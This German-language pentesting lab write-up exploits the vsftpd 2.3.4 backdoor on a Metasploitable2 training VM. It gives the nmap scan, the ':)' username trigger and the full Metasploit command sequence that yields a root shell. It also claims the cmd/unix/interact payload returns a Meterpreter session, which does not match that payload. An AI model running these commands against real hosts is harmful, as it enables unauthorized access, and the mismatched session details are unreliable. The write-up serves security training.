
Ausnutzen der Hintertür in vsftpd 2.3.4 (CVE-2011-2523) auf Metasploitable2 — ein praxisorientierter Pentesting-Laborbericht, der Recon, Ausnutzung und Behebung abdeckt.
Ein praxisnahes Lab, das die Entdeckung und Ausnutzung einer bekannten Backdoor-Schwachstelle in vsftpd 2.3.4 in einer isolierten Kali-Linux-↔-Metasploitable2-Umgebung demonstriert.
Den zentralen Penetration-Testing-Workflow üben — Reconnaissance, Schwachstellenidentifikation, Exploitation und Post-Exploitation-Verifizierung — gegen eine absichtlich verwundbare Zielmaschine.
| Komponente | Details |
|---|---|
| Angreifer | Kali Linux 2026.1 (VMware) |
| Ziel | Metasploitable2 (VMware) |
| Netzwerk | NAT, vom Host/Internet isoliert |
| Ziel-IP | 192.168.233.129 |
Beide VMs befanden sich im selben privaten Netzwerksegment, isoliert vom echten Netzwerk, um sicherzustellen, dass die Übung keinerlei externe Exposition hatte.
nmap -sV -sC 192.168.233.129
Das Ziel wurde auf offene Ports und Dienstversionen gescannt. Die Ergebnisse umfassten:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
...

Port 21 lief mit vsftpd 2.3.4. Diese spezifische Version ist öffentlich dafür bekannt, eine Backdoor zu enthalten: 2011 wurde das offizielle vsftpd-Quellarchiv kompromittiert und bösartiger Code eingefügt. Die Anmeldung mit einem Benutzernamen, der die Zeichenfolge :) enthält, löst einen versteckten Listener auf TCP-Port 6200 aus, der eine nicht authentifizierte Remote-Shell gewährt.
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run
Der Exploit hat die Backdoor erfolgreich ausgelöst und eine Meterpreter-Sitzung zurückgegeben.

sessions -i 1
sysinfo
getuid
Aktive Sitzung und Zugriffsebene auf dem kompromittierten Host wurden bestätigt.


Durch die Ausnutzung eines einzigen veralteten und mit einer Backdoor versehenen Dienstes wurde vollständiger Remote-Shell-Zugriff auf Root-Ebene auf der Zielmaschine erlangt — ohne jegliche Authentifizierung.
Ein einziger veralteter Dienst mit einer bekannten, öffentlichen Schwachstelle reichte für eine vollständige Systemkompromittierung aus — ohne individuelle Exploit-Entwicklung oder fortgeschrittene Techniken. Dies verdeutlicht, warum Patch-Management und Versionshygiene grundlegend für eine reale Sicherheitslage sind.
Diese Übung wurde ausschließlich gegen Metasploitable2 durchgeführt, eine absichtlich verwundbare, für Sicherheitstrainings entwickelte virtuelle Maschine, innerhalb eines isolierten Labornetzwerks ohne Verbindung zu Produktionssystemen oder Infrastruktur Dritter.